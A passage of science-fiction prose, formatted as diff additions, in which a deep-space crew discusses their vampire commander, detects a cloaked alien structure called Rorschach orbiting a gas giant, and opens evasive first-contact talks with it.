+"Pretty good. I think I'm finally used to being alive again. You?"
+"Hey, I'm a spaz no matter how long I've been dead."
+"You get the job done."
+"Why, merci. I try."
+A small silence. Theseus hummed quietly to herself.
+"Mom was right," Michelle said. "They are beautiful."
+"What do you see, when you look at them?" And then, catching himself: "I mean—"
+"They're—prickly," Michelle told him. "When I turn my head it's like bands of very fine needles rolling across my skin in waves. But it doesn't hurt at all. It just tingles. It's almost electric. It's nice."
+"Wish I could feel it that way."
+"You've got the interface. Just patch a camera into your parietal lobe instead of your visual cortex."
+"That'd just tell me how a machine feels vision, eh? Still wouldn't know how you do."
+"Isaac Szpindel. You're a romantic."
+"Nah."
+"You don't want to know. You want to keep it mysterious."
+"Already got more than enough mystery to deal with out here, in case you hadn't noticed."
+"Yeah, but we can't do anything about that."
+"That'll change. We'll be working our asses off in no time."
+"You think?"
+"Count on it," Szpindel said. "So far we've just been peeking from a distance, eh? Bet all kinds of interesting stuff happens when we get in there and start poking with a stick."
+"Maybe for you. There's got to be a biological somewhere in the mix, with all those organics."
+"Damn right. And you'll be talking to 'em while I'm giving them their physicals."
+"Maybe not. I mean, Mom would never admit it in a million years but you had a point about language. When you get right down to it, it's a workaround. Like trying to describe dreams with smoke signals. It's noble, it's maybe the most noble thing a body can do but you can't turn a sunset into a string of grunts without losing something. It's limiting. Maybe whatever's out here doesn't even use it."
+"Bet they do, though."
+"Since when? You're the one who's always pointing out how inefficient language is."
+"Only when I'm trying to get under your skin. Your pants—whole other thing." He laughed at his own joke. "Seriously, what are they gonna to use instead, telepathy? I say you'll be up to your elbows in hieroglyphics before you know it. And what's more, you'll decode 'em in record time."
+"You're sweet, but I wonder. Half the time I can't even decode Jukka." Michelle fell silent a moment. "He actually kind of throws me sometimes."
+"You and seven billion others."
+"Yeah. I know it's silly, but when he's not around there's a part of me that can't stop wondering where he's hiding. And when he's right there in front of me, I feel like I should be hiding."
+"Not his fault he creeps us out."
+"I know. But it's hardly a big morale booster. What genius came up with the idea of putting a vampire in charge?"
+"Where else you going to put them, eh? You want to be the one giving orders to him?"
+"And it's not just the way he moves. It's the way he talks. It's just wrong."
+"You know he—"
+"I'm not talking about the present-tense thing, or all the glottals. He—well, you know how he talks. He's terse."
+"It's efficient."
+"It's artificial, Isaac. He's smarter than all of us put together, but sometimes he talks like he's got a fifty-word vocabulary." A soft snort. "It's not like it'd kill him to use an adverb once in a while."
+"Ah. But you say that because you're a linguist, and you can't see why anyone wouldn't want to wallow in the sheer beauty of language." Szpindel harrumphed with mock pomposity. "Now me, I'm a biologist, so it makes perfect sense."
+"Really. Then explain it to me, oh wise and powerful mutilator of frogs."
+"Simple. Bloodsucker's a transient, not a resident."
+"What are—oh, those are killer whales, right? Whistle dialects."
+"I said forget the language. Think about the lifestyle. Residents are fish-eaters, eh? They hang out in big groups, don't move around much, talk all the time." I heard a whisper of motion, imagined Szpindel leaning in and laying a hand on Michelle's arm. I imagined the sensors in his gloves telling him what she felt like. "Transients, now—they eat mammals. Seals, sea lions, smart prey. Smart enough to take cover when they hear a fluke slap or a click train. So transients are sneaky, eh? Hunt in small groups, range all over the place, keep their mouths shut so nobody hears 'em coming."
+"And Jukka's a transient."
+"Man's instincts tell him to keep quiet around prey. Every time he opens his mouth, every time he lets us see him, he's fighting his own brain stem. Maybe we shouldn't be too harsh on the ol' guy just because he's not the world's best motivational speaker, eh?"
+"He's fighting the urge to eat us every time we have a briefing? That's reassuring."
+Szpindel chuckled. "It's probably not that bad. I guess even killer whales let their guard down after making a kill. Why sneak around on a full stomach, eh?"
+"So he's not fighting his brain stem. He just isn't hungry."
+"Probably a little of both. Brain stem never really goes away, you know. But I'll tell you one thing." Some of the playfulness ebbed from Szpindel's voice. "I've got no problem if Sarasti wants to run the occasional briefing from his quarters. But the moment we stop seeing him altogether? That's when you start watching your back."
+
+*
+
+Looking back, I can finally admit it: I envied Szpindel his way with the ladies. Spliced and diced, a gangly mass of tics and jitters that could barely feel his own skin, somehow he managed to be—
+Charming. That's the word. Charming.
+As a social necessity it was all but obsolete, fading into irrelevance along with two-party nonvirtual sex pairing. But even I'd tried one of those; and it would have been nice to have had Szpindel's self-deprecating skill set to call on.
+Especially when everything with Chelsea started falling apart.
+I had my own style, of course. I tried to be charming in my own peculiar way. Once, after one too many fights about honesty and emotional manipulation, I'd started to think maybe a touch of whimsy might smooth things over. I had come to suspect that Chelsea just didn't understand sexual politics. Sure she'd edited brains for a living, but maybe she'd just memorized all that circuitry without giving any thought to how it had arisen in the first place, to the ultimate rules of natural selection that had shaped it. Maybe she honestly didn't know that we were evolutionary enemies, that all relationships were doomed to failure. If I could slip that insight into her head— if I could charm my way past her defenses— maybe we'd be able to hold things together.
+So I thought about it, and I came up with the perfect way to raise her awareness. I wrote her a bedtime story, a disarming blend of humor and affection, and I called it
+
+The Book of Oogenesis
+
+In the beginning were the gametes. And though there was sex, lo, there was no gender, and life was in balance.
+And God said, "Let there be Sperm": and some seeds did shrivel in size and grow cheap to make, and they did flood the market.
+And God said, "Let there be Eggs": and other seeds were afflicted by a plague of Sperm. And yea, few of them bore fruit, for Sperm brought no food for the zygote, and only the largest Eggs could make up the shortfall. And these grew yet larger in the fullness of time.
+And God put the Eggs into a womb, and said, "Wait here: for thy bulk has made thee unwieldy, and Sperm must seek thee out in thy chambers. Henceforth shalt thou be fertilized internally." And it was so.
+And God said to the gametes, "The fruit of thy fusion may abide in any place and take any shape. It may breathe air or water or the sulphurous muck of hydrothermal vents. But do not forget my one commandment unto you, which has not changed from the beginning of time: spread thy genes."
+And thus did Sperm and Egg go into the world. And Sperm said, "I am cheap and plentiful, and if sowed abundantly I will surely fulfill God's plan. I shall forever seek out new mates and then abandon them when they are with child, for there are many wombs and little time."
+But Egg said, "Lo, the burden of procreation weighs heavily upon me. I must carry flesh that is but half mine, gestate and feed it even when it leaves my chamber" (for by now many of Egg's bodies were warm of blood, and furry besides). "I can have but few children, and must devote myself to those, and protect them at every turn. And I will make Sperm help me, for he got me into this. And though he doth struggle at my side, I shall not let him stray, nor lie with my competitors."
+And Sperm liked this not.
+And God smiled, for Its commandment had put Sperm and Egg at war with each other, even unto the day they made themselves obsolete.
+
+I brought her flowers one dusky Tuesday evening when the light was perfect. I pointed out the irony of that romantic old tradition— the severed genitalia of another species, offered as a precopulatory bribe—and then I recited my story just as we were about to fuck.
+To this day, I still don't know what went wrong.
+
+"The glass ceiling is in you. The glass ceiling is conscience."
+—Jacob Holtzbrinck, The Keys to the Planet
+
+There were stories, before we left Earth, of a fourth wave: a fleet of deep-space dreadnoughts running silent in our wake, should the cannon fodder up front run into something nasty. Or, if the aliens were friendly, an ambassadorial frigate full of politicians and CEOs ready to elbow their way to the front of the line. Never mind that Earth had no deep-space dreadnoughts or ambassadorial spaceships; Theseus hadn't existed either, before Firefall. Nobody had told us of any such such contingent, but you never show the Big Picture to your front line. The less they know, the less they can betray.
+I still don't know if the fourth wave ever existed. I never saw any evidence of one, for whatever that's worth. We might have left them floundering back at Burns-Caulfield. Or maybe they followed us all the way to Big Ben, crept just close enough to see what we were up against, and turned tail before things got ugly.
+I wonder if that's what happened. I wonder if they made it back home.
+I look back now, and hope not.
+
+*
+
+A giant marshmallow kicked Theseus in the side. Down swung like a pendulum. Across the drum Szpindel yelped as if scalded; in the galley, cracking a bulb of hot coffee, I nearly was.
+This is it, I thought. We got too close. They're hitting back.
+"What the—"
+A flicker on the party line as Bates linked from the bridge. "Main drive just kicked in. We're changing course."
+"To what? Where? Whose orders?"
+"Mine," Sarasti said, appearing above us.
+Nobody spoke. Drifting into the drum through the stern hatchway: the sound of something grinding. I pinged Theseus' resource-allocation stack. Fabrication was retooling itself for the mass production of doped ceramics.
+Radiation shielding. Solid stuff, bulky and primitive, not the controlled magnetic fields we usually relied on.
+The Gang emerged sleepy-eyed from their tent, Sascha grumbling, "What the fuck?"
+"Watch." Sarasti took hold of ConSensus and shook it.
+It was a blizzard, not a briefing: gravity wells and orbital trajectories, shear-stress simulations in thunderheads of ammonium and hydrogen, stereoscopic planetscapes buried under filters ranging from gamma to radio. I saw breakpoints and saddlepoints and unstable equilibria. I saw fold catastrophes plotted in five dimensions. My augments strained to rotate the information; my meaty half-brain struggled to understand the bottom line.
+Something was hiding down there, in plain sight.
+Ben's accretion belt still wasn't behaving. Its delinquency wasn't obvious; Sarasti hadn't had to plot every pebble and mountain and planetesimal to find the pattern, but he'd come close. And neither he nor the conjoined intelligence he shared with the Captain had been able to explain those trajectories as the mere aftermath of some past disturbance. The dust wasn't just settling; some of it marched downhill to the beat of something that even now reached out from the cloud-tops and pulled debris from orbit.
+Not all that debris seemed to hit. Ben's equatorial regions flickered constantly with the light of meteorite impacts—much fainter than the bright wakes of the skimmers, and gone in the wink of an eye—but those frequency distributions didn't quite account for all the rocks that had fallen. It was almost as though, every now and then, some piece of incoming detritus simply vanished into a parallel universe.
+Or got caught by something in this one. Something that circled Ben's equator every forty hours, almost low enough to graze the atmosphere. Something that didn't show up in visible light, or infrared, or radar. Something that might have remained pure hypothesis if a skimmer hadn't burned an incandescent trail across the atmosphere behind it when Theseus happened to be watching.
+Sarasti threw that one dead center: a bright contrail streaking diagonally across Ben's perpetual nightscape, stuttering partway a degree or two to the left, stuttering back just before it passed from sight. Freeze-frame showed a beam of light frozen solid, a segment snapped from its midsection and jiggled just a hair out of alignment.
+A segment nine kilometers long.
+"It's cloaked," Sascha said, impressed.
+"Not very well." Bates emerged from the forward hatch and sailed spinward. "Pretty obvious refractory artefact." She caught stairs halfway to the deck, used the torque of spin-against-spam to flip upright and plant her feet on the steps. "Why didn't we catch that before?"
+"No backlight," Szpindel suggested.
+"It's not just the contrail. Look at the clouds." Sure enough, Ben's cloudy backdrop showed the same subtle dislocation. Bates stepped onto the deck and headed for the conference table. "We should've seen this earlier."
+"The other probes see no such artefact," Sarasti said. "This probe approaches from a wider angle. Twenty-seven degrees."
+"Wider angle to what?" Sascha said.
+"To the line," Bates murmured. "Between us and them."
+It was all there on tactical: Theseus fell inwards along an obvious arc, but the probes we'd dispatched hadn't dicked around with Hohmann transfers: they'd burned straight down, their courses barely bending, all within a few degrees of the theoretical line connecting Ben to Theseus.
+Except this one. This one had come in wide, and seen the trickery.
+"The further from our bearing, the more obvious the discontinuity," Sarasti intoned. "Think it's clearly visible on any approach perpendicular to ours."
+"So we're in a blind spot? We see it if we change course?"
+Bates shook her head. "The blind spot's moving, Sascha. It's—"
+"Tracking us." Sascha sucked breath between her teeth. "Motherfucker."
+Szpindel twitched. "So what is it? Our skimmer factory?"
+The freeze-frame's pixels began to crawl. Something emerged, granular and indistinct, from the turbulent swirls and curlicues of Ben's atmosphere. There were curves, and spikes, and no smooth edges; I couldn't tell how much of the shape was real, and how much a fractal intrusion of underlying cloudscape. But the overall outline was that of a torus, or perhaps a collection of smaller jagged things piled together in a rough ring; and it was big. Those nine klicks of displaced contrail had merely grazed the perimeter, cut across an arc of forty or fifty degrees. This thing hiding in the shadow of ten Jupiters was almost thirty kilometers from side to side.
+Sometime during Sarasti's executive summary we'd stopped accellerating. Down was back where it belonged. We weren't, though. Our hesitant maybe-maybe-not approach was a thing of the past: we vectored straight in now, and damn the torpedoes.
+"Er, that's thirty klicks across," Sascha pointed out. "And it's invisible. Shouldn't we maybe be a little more cautious now?"
+Szpindel shrugged. "We could second-guess vampires, we wouldn't need vampires, eh?"
+A new facet bloomed on the feed. Frequency histograms and harmonic spectra erupted from flatline into shifting mountainscapes, a chorus of visible light.
+"Modulated laser," Bates reported.
+Szpindel looked up. "From that?"
+Bates nodded. "Right after we blow its cover. Interesting timing."
+"Scary timing," Szpindel said. "How'd it know?"
+"We changed course. We're heading right for it."
+The lightscape played on, knocking at the window.
+"Whatever it is," Bates said, "it's talking to us."
+"Well then," remarked a welcome voice. "By all means let's say hello."
+Susan James was back in the driver's seat.
+
+*
+
+I was the only pure spectator.
+They all performed what duties they could. Szpindel ran Sarasti's sketchy silhouette through a series of filters, perchance to squeeze a bit of biology from engineering. Bates compared morphometrics between the cloaked artefact and the skimmers. Sarasti watched us all from overhead and thought vampire thoughts deeper than anything we could aspire to. But it was all just make-work. The Gang of Four was on center stage, under the capable direction of Susan James.
+She grabbed the nearest chair, sat, raised her hands as if cueing an orchestra. Her fingers trembled in mid-air as she played virtual icons; her lips and jaw twitched with subvocal commands. I tapped her feed and saw text accreting around the alien signal:
+
+Rorschach to vessel approaching 116Az -23dec rel. Hello Theseus. Rorschach to vessel approaching 116Az -23dec rel. Hello Theseus. Rorschach to vessel approachi
+
+
+She'd decoded the damn thing. Already. She was even answering it:
+
+Theseus to Rorschach. Hello Rorschach.
+
+
+
+Hello Theseus. Welcome to the neighborhood.
+
+
+She'd had less than three minutes. Or rather, they'd had less than three minutes: four fully-conscious hub personalities and a few dozen unconscious semiotic modules, all working in parallel, all exquisitely carved from the same lump of gray matter. I could almost see why someone would do such deliberate violence to their own minds, if it resulted in this kind of performance.
+Up to now I had never fully convinced myself that even survival was sufficient cause.
+Request permission to approach, the Gang sent. Simple and straightforward: just facts and data, thank you, with as little room as possible for ambiguity and misunderstanding. Fancy sentiments like we come in peace could wait. A handshake was not the time for cultural exchange.
+
+You should stay away. Seriously. This place is dangerous.
+
+
+That got some attention. Bates and Szpindel hesitated momentarily in their own headspaces and glanced into James'.
+
+Request information on danger, the gang sent back. Still keeping it concrete.
+
+
+
+
+Too close and dangerous to you. low orbit complications.
+
+
+Request information on low orbit complications.
+
+
+
+
+Lethal environment. Rocks and rads. You're welcome. I can take it but we're like that.
+
+
+We are aware of the rocks in low orbit. We are equipped to deal with radiation. Request information on other hazards.
+
+
+I dug under the transcript to the channel it fed from. Theseus had turned part of the incoming beam into a sound wave, according to the color code. Vocal communication, then. They spoke. Waiting behind that icon were the raw sounds of an alien language.
+Of course I couldn't resist.
+"Anytime between friends, right? Are you here for the celebration?"
+English. The voice was human, male. Old.
+"We are here to explore," replied the Gang, although their voice was pure Theseus. "Request dialog with agents who sent objects into near-solar space."
+"First contact. Sounds like something to celebrate."
+I double-checked the source. No, this wasn't a translation; this was the actual unprocessed signal coming from—Rorschach, it had called itself. Part of the signal, anyway; there were other elements, nonacoustic ones, encoded in the beam.
+I browsed them while James said, "Request information about your celebration": standard ship-to-ship handshaking protocols.
+"You're interested." The voice was stronger now, younger.
+"Yes."
+"You are?"
+"Yes," the Gang repeated patiently.
+"You are?"
+The slightest hesitation. "This is Theseus."
+"I know that, baseline." In Mandarin, now. "Who are you?"
+No obvious change in the harmonics. Somehow, though, the voice seemed to have acquired an edge.
+"This is Susan James. I am a—"
+"You wouldn't be happy here, Susan. Fetishistic religious beliefs involved. There are dangerous observances."
+James chewed her lip.
+"Request clarification. Are we in danger from these observances?"
+"You certainly could be."
+"Request clarification. Is it the observances that are dangerous, or the low-orbit environment?"
+"The environment of the disturbances. You should pay attention, Susan. Inattention connotes indifference," Rorschach said.
+"Or disrespect," it added after a moment.
+
+*
+
+We had four hours before Ben got in the way. Four hours of uninterrupted nonstop communication made vastly easier than anyone had expected. It spoke our language, after all. Repeatedly it expressed polite concern for our welfare. And yet, for all its facility with Human speech it told us very little. For four hours it managed to avoid giving a straight answer on any subject beyond the extreme inadvisability of closer contact, and by the time it fell into eclipse we still didn't know why.
+Sarasti dropped onto the deck halfway through the exchange, his feet never touching the stairs. He reached out and grabbed a railing to steady himself on landing, and staggered only briefly. If I'd tried that I'd have ended up bouncing along the deck like a pebble in a cement mixer.
+He stood still as stone for the rest of the session, face motionless, eyes hidden behind his onyx visor. When Rorschach's signal faded in midsentence he assembled us around the Commons table with a gesture.
+"It talks," he said.
+James nodded. "It doesn't say much, except for asking us to keep our distance. So far the voice has manifested as adult male, although the apparent age changed a few times."
+He'd heard all that. "Structure?"
+"The ship-to-ship protocols are perfect. Its vocabulary is far greater than you could derive from standard nav chatter between a few ships, so they've been listening to all our insystem traffic—I'd say for several years at least. On the other hand, the vocabulary doesn't have anywhere near the range you'd get by monitoring entertainment multimede, so they probably arrived after the Broadcast Age."
+"How well do they use the vocabulary they have?"
+"They're using phrase-structure grammar, long-distance dependencies. FLN recursion, at least four levels deep and I see no reason why it won't go deeper with continued contact. They're not parrots, Jukka. They know the rules. That name, for example—"
+"Rorschach," Bates murmered, knuckles cracking as she squeezed her pet ball. "Interesting choice."
+"I checked the registry. There's an I-CAN freighter called Rorschach on the Martian Loop. Whoever we're talking to must regard their own platform the way we'd regard a ship, and picked one of our names to fit."
+Szpindel dropped into the chair beside me, fresh from a galley run. A bulb of coffee glistened like gelatin in his hand. "That name, out of all the ships in the innersys? Seems way too symbolic for a random choice."
+"I don't think it was random. Unusual ship names provoke comment; Rorschach's pilot goes ship-to-ship with some other vessel, the other vessel comes back with oh Grandma, what an unusual name you have, Rorschach replies with some off-the-cuff comment about nomenclatural origins and it all goes out in the EM. Someone listening to all that chatter not only figures out the name and the thing it applies to, but can get some sense of meaning from the context. Our alien friends probably eavesdropped on half the registry and deduced that Rorschach would be a better tag for something unfamiliar than, say, the SS Jaymie Matthews."
+"Territorial and smart." Szpindel grimaced, conjuring a mug from beneath his chair. "Wonderful."
+Bates shrugged. "Territorial, maybe. Not necessarily aggressive. In fact, I wonder if they could hurt us even if they wanted to."
+"I don't," Szpindel said. "Those skimmers—"
+The major waved a dismissive hand. "Big ships turn slowly. If they were setting up to snooker us we'd see it well in advance." She looked around the table. "Look, am I the only one who finds this odd? An interstellar technology that redecorates superJovians and lines up meteoroids like elephants on parade, and they were hiding? From us?"
+"Unless there's someone else out here," James suggested uneasily.
+Bates shook her head. "The cloak was directional. It was aimed at us and no one else."
+"And even we saw through it," Szpindel added.
+"Exactly. So they go to Plan B, which so far amounts to nothing but bluster and vague warnings. I'm just saying, they're not acting like giants. Rorschach's behavior feels—improvised. I don't think they expected us."
+"'Course not. Burns-Caulfield was—"
+"I don't think they expected us yet."
+"Um," Szpindel said, digesting it.
+The major ran one hand over her naked scalp. "Why would they expect us to just give up after we learned we'd been sniped? Of course we'd look elsewhere. Burns-Caulfield could only have been intended as a delaying action; if I was them, I'd plan on us getting out here eventually. But I think they miscalculated somehow. We got out here sooner than they expected and caught them with their pants down."
+Szpindel split the bulb and emptied it into his mug. "Pretty large miscalculation for something so smart, eh?" A hologram bloomed on contact with the steaming liquid, glowing in soft commemoration of the Gaza Glasslands. The scent of plasticised coffee flooded the Commons. "Especially after they'd surveilled us down to the square meter," he added.
+"And what did they see? I-CANNs. Solar sails. Ships that take years to reach the Kuiper, and don't have the reserves to go anywhere else afterwards. Telematter didn't exist beyond Boeing's simulators and a half-dozen protypes back then. Easy to miss. They must've figured one decoy would buy them all the time they needed."
+"To do what?" James wondered.
+"Whatever it is," Bates said, "We're ringside."
+Szpindel raised his mug with an infirm hand and sipped. The coffee trembled in its prison, the surface wobbling and blobbing in the drum's half-hearted gravity. James pursed her lips in faint disapproval. Open-topped containers for liquids were technically verboten in variable-gravity environments, even for people without Szpindel's dexterity issues.
+"So they're bluffing," Szpindel said at last.
+Bates nodded. "That's my guess. Rorschach's still under construction. We could be dealing with an automated system of some kind."
+"So we can ignore the keep-off-the-grass signs, eh? Walk right in."
+"We can afford to bide our time. We can afford to not push it."
+"Ah. So even though we could maybe handle it now, you want to wait until it graduates from covert to invulnerable." Szpindel shuddered, set down his coffee. "Where'd you get your military training again? Sporting Chance Academy?"
+Bates ignored the jibe. "The fact that Rorschach's still growing may be the best reason to leave it alone for a while. We don't have any idea what the—mature, I guess—what the mature form of this artefact might be. Sure, it hid. Lots of animals take cover from predators without being predators, especially young ones. Sure, it's—evasive. Doesn't give us the answers we want. But maybe it doesn't know them, did you consider that? How much luck would you have interrogating a Human embryo? Adult could be a whole different animal."
+"Adult could put our asses through a meatgrinder."
+"So could the embryo for all we know." Bates rolled her eyes. "Jesus, Isaac, you're the biologist. I shouldn't have to tell you how many shy reclusive critters pack a punch when they're cornered. Porcupine doesn't want any trouble, but he'll still give you a faceful of quills if you ignore the warning."
+Szpindel said nothing. He slid his coffee sideways along the concave tabletop, to the very limit of his reach. The liquid sat there in its mug, a dark circle perfectly parallel to the rim but canted slightly towards us. I even thought I could make out the merest convexity in the surface itself.
+Szpindel smiled faintly at the effect.
+James cleared her throat. "Not to downplay your concerns, Isaac, but we've hardly exhausted the diplomatic route. And at least it's willing to talk, even if it's not as forthcoming as we'd like."
+"Sure it talks," Szpindel said, eyes still on the leaning mug. "Not like us."
+"Well, no. There's some—"
+"It's not just slippery, it's downright dyslexic sometimes, you noticed? And it mixes up its pronouns."
+"Given that it picked up the language entirely via passive eavesdropping, it's remarkably fluent. In fact, from what I can tell they're more efficient at processing speech than we are."
+"Gotta be efficient at a language if you're going to be so evasive in it, eh?"
+"If they were human I might agree with you," James replied. "But what appears to us as evasion or deceit could just as easily be explained by a reliance on smaller conceptual units."
+"Conceptual units?" Bates, I was beginning to realize, never pulled up a subtitle if she could help it.
+James nodded. "Like processing a line of text word by word, instead of looking at complete phrases. The smaller the units, the faster they can be reconfigured; it gives you very fast semantic reflexes. The down side is that it's difficult to maintain the same level of logical consistency, since the patterns within the larger structure are more likely to get shuffled."
+"Whoa." Szpindel straightened, all thoughts of liquids and centipetal force forgotten.
+"All I'm saying is, we aren't necessarily dealing with deliberate deception here. An entity who parses information at one scale might not be aware of inconsistencies on another; it might not even have conscious access to that level."
+"That's not all you're saying."
+"Isaac, you can't apply Human norms to a—"
+"I wondered what you were up to." Szpindel dove into the transcripts. A moment later he dredged up an excerpt:
+
+Request information on environments you consider lethal. Request information on your response to the prospect of imminent exposure to lethal environments.
+
+Glad to comply. But your lethal is different from us. there are many migrating circumstances.
+
+
+"You were testing it!" Szpindel crowed. He smacked his lips; his jaw ticced. You were looking for an emotional response!"
+"It was just a thought. It didn't prove anything."
+"Was there a difference? In the response time?"
+James hesitated, then shook her head. "But it was a stupid idea. There are so many variables, we have no idea how they—I mean, they're alien..."
+"The pathology's classic."
+"What pathology?" I asked.
+"It doesn't mean anything except that they're different from the Human baseline," James insisted. "Which is not something anyone here can look down their nose about."
+I tried again: "What pathology?"
+James shook her head. Szpindel filled me in: "There's a syndrome you might have heard about, eh? Fast talkers, no conscience, tend to malapropism and self-contradiction. No emotional affect."
+"We're not talking about human beings here," James said again, softly.
+"But if we were," Szpindel added, "we might call Rorschach a clinical sociopath."
+Sarasti had said nothing during this entire exchange. Now, with the word hanging out in the open, I noticed that nobody else would look at him.
+
+*
+
+We all knew that Jukka Sarasti was a sociopath, of course. Most of us just didn't mention it in polite company.
+Szpindel was never that polite. Or maybe it was just that he seemed to almost understand Sarasti; he could look behind the monster and regard the organism, no less a product of natural selection for all the human flesh it had devoured in eons past. That perspective calmed him, somehow. He could watch Sarasti watching him, and not flinch.
+"I feel sorry for the poor son of a bitch," he said once, back in training.
+Some would have thought that absurd. This man, so massively interfaced with machinery that his own motor skills had degraded for want of proper care and feeding; this man who heard x-rays and saw in shades of ultrasound, so corrupted by retrofits he could no longer even feel his own fingertips without assistance—this man could pity anyone else, let alone an infra-eyed predator built to murder without the slightest twitch of remorse?
+"Empathy for sociopaths isn't common," I remarked.
+"Maybe it should be. We, at least—" he waved an arm; some remote-linked sensor cluster across the simulator whirred and torqued reflexively— "chose the add-ons. Vampires had to be sociopaths. They're too much like their own prey—a lot of taxonomists don't even consider them a subspecies, you know that? Never diverged far enough for complete reproductive isolation. So maybe they're more syndrome than race. Just a bunch of obligate cannibals with a consistent set of deformities."
+"And how does that make—"
+"If the only thing you can eat is your own kind, empathy is gonna be the first thing that goes. Psychopathy's no disorder in those shoes, eh? Just a survival strategy. But they still make our skin crawl, so we—chain 'em up."
+"You think we should've repaired the Crucifix glitch?" Everyone knew why we hadn't. Only a fool would resurrect a monster without safeguards in place. Vampires came with theirs built in: without his antiEuclideans Sarasti would go grand mal the first time he caught close sight of a four-panel window frame.
+But Szpindel was shaking his head. "We couldn't have fixed it. Or we could have," he amended, "but the glitch is in the visual cortex, eh? Linked to their omnisavantism. You fix it, you disable their pattern-matching skills, and then what's the point in even bringing them back?"
+"I didn't know that."
+"Well, that's the official story." He fell silent a moment, cracked a crooked grin. "Then again, we didn't have any trouble fixing the protocadherin pathways when it suited us."
+I subtitled. Context-sensitive, ConSensus served up protocadherin γ-Y: the magical hominid brain protein that vampires had never been able to synthesize. The reason they hadn't just switched to zebras or warthogs once denied Human prey, why our discovery of the terrible secret of the Right Angle had spelled their doom.
+"Anyway, I just think he's—cut off." A nervous tic tugged at the corner of Szpindel's mouth. "Lone wolf, nothing but sheep for company. Wouldn't you feel lonely?"
+"They don't like company," I reminded him. You didn't put vampires of the same sex together, not unless you were taking bets on a bloodbath. They were solitary hunters and very territorial. With a minimum viable pred-prey ratio of one to ten—and human prey spread so sparsely across the Pleistocene landscape—the biggest threat to their survival had been competition from their own kind. Natural selection had never taught them to play nicely together.
+That didn't cut any ice with Szpindel, though. "Doesn't mean he can't be lonely," he insisted.
+"Just means he can't fix it."
+"They know the music but not the words."
+— Hare, Without Conscience
+
+We did it with mirrors, great round parabolic things, each impossibly thin and three times as high as a man. Theseus rolled them up and bolted them to firecrackers stuffed with precious antimatter from our dwindling stockpiles. With twelve hours to spare she flung them like confetti along precise ballistic trajectories, and when they were safely distant she set them alight. They pinwheeled off every which way, gamma sleeting in their wake until they burned dry. Then they coasted, unfurling mercurial insect wings across the void.
+In the greater distance, four hundred thousand alien machines looped and burned and took no obvious notice.
+Rorschach fell around Ben barely fifteen hundred kilometers from atmosphere, a fast endless circle that took just under forty hours to complete. By the time it didn't return to our sight, the mirrors were all outside the zone of total blindness. A closeup of Ben's equatorial edge floated in ConSensus. Mirror icons sparkled around it like an exploding schematic, like the disconnected facets of some great expanding compound eye. None had brakes. Whatever high ground the mirrors held, they wouldn't hold it for long.
+"There," Bates said.
+A mirage wavered stage left, a tiny spot of swirling chaos perhaps half the size of a fingernail held at arms-length. It told us nothing, it was pure heat-shimmer—but light bounced towards us from dozens of distant relayers, and while each saw scarcely more than our last probe had— a patch of dark clouds set slightly awry by some invisible prism— each of those views refracted differently. The Captain sieved flashes from the heavens and stitched them into a composite view.
+Details emerged.
+First a faint sliver of shadow, a tiny dimple all but lost in the seething equatorial cloud bands. It had just barely rotated into view around the edge of the disk— a rock in the stream perhaps, an invisible finger stuck in the clouds, turbulence and shear stress shredding the boundary layers to either side.
+Szpindel squinted. "Plage effect." Subtitles said he was talking about a kind of sunspot, a knot in Ben's magnetic field.
+"Higher," James said.
+Something floated above that dimple in the clouds, the way a ground-effect ocean-liner floats above the depression it pushes into the water's surface. I zoomed: next to an Oasa subdwarf with ten times the mass of Jupiter, Rorschach was tiny.
+Next to Theseus, it was a colossus.
+Not just a torus but a tangle, a city-sized chaos of spun glass, loops and bridges and attenuate spires. The surface texture was pure artifice, of course; ConSensus merely giftwrapped the enigma in refracted background. Still. In some dark, haunting way, it was almost beautiful. A nest of obsidian snakes and smoky crystal spines.
+"It's talking again," James reported.
+"Talk back," Sarasti said, and abandoned us.
+
+*
+
+So she did: and while the Gang spoke with the artefact, the others spied upon it. Their vision failed over time—mirrors fell away along their respective vectors, lines-of-sight degraded with each passing second—but ConSensus filled with things learned in the meantime. Rorschach massed 1.8.1010 kg within a total volume of 2.3.108 cubic meters. Its magnetic field, judging by radio squeals and its Plage Effect, was thousands of times stronger than the sun's. Astonishingly, parts of the composite image were clear enough to discern fine spiral grooves twined around the structure. ("Fibonacci sequence," Szpindel reported, one jiggling eye fixing me for a moment. "At least they're not completely alien.") Spheroid protuberances disfigured the tips of at least three of Rorschach's innumerable spines; the grooves were more widely spaced in those areas, like skin grown tight and swollen with infection. Just before one vital mirror sailed out of range it glimpsed another spine, split a third of the way along its length. Torn material floated flaccid and unmoving in vacuum.
+"Please," Bates said softly. "Tell me that's not what it looks like."
+Szpindel grinned. "Sporangium? Seed pod? Why not?"
+Rorschach may have been reproducing but beyond a doubt it was growing, fed by a steady trickle of infalling debris from Ben's accretion belt. We were close enough now to get a clear view of that procession: rocks and mountains and pebbles fell like sediment swirling around a drain. Particles that collided with the artefact simply stuck; Rorschach engulfed prey like some vast metastatic amoeba. The acquired mass was apparently processed internally and shunted to apical growth zones; judging by infinitesimal changes in the artefact's allometry, it grew from the tips of its branches.
+The procession never stopped. Rorschach was insatiable.
+It was a strange attractor in the interstellar gulf; the paths along which the rocks fell was precisely and utterly chaotic. It was as though some Keplerian Black Belt had set up the whole system like an astronomical wind-up toy, kicked everything into motion, and let inertia do the rest.
+"Didn't think that was possible," Bates said.
+Szpindel shrugged. "Hey, chaotic trajectories are just as deterministic as any other kind."
+"That doesn't mean you can even predict them, let along set them up like that." Luminous intel reflected off the major's bald head. "You'd have to know the starting conditions of a million different variables to ten decimal places. Literally."
+"Yup."
+"Vampires can't even do that. Quanticle computers can't do that."
+Szpindel shrugged like a marionette.
+All the while the Gang had been slipping in and out of character, dancing with some unseen partner that—despite their best efforts— told us little beyond endless permutations of You really wouldn't like it here. Any interrogative it answered with another— yet somehow it always left the sense of questions answered.
+"Did you send the Fireflies?" Sascha asked.
+"We send many things many places," Rorschach replied. "What do their specs show?"
+"We do not know their specifications. The Fireflies burned up over Earth."
+"Then shouldn't you be looking there? When our kids fly, they're on their own."
+Sascha muted the channel. "You know who we're talking to? Jesus of fucking Nazareth, that's who."
+Szpindel looked at Bates. Bates shrugged, palms up.
+"You didn't get it?" Sascha shook her head. "That last exchange was the informational equivalent of Should we render taxes unto Caesar. Beat for beat."
+"Thanks for casting us as the Pharisees," Szpindel grumbled.
+"Hey, if the Jew fits..."
+Szpindel rolled his eyes.
+That was when I first noticed it: a tiny imperfection on Sascha's topology, a flyspeck of doubt marring one of her facets. "We're not getting anywhere," she said. "Let's try a side door." She winked out: Michelle reopened the outgoing line. "Theseus to Rorschach. Open to requests for information."
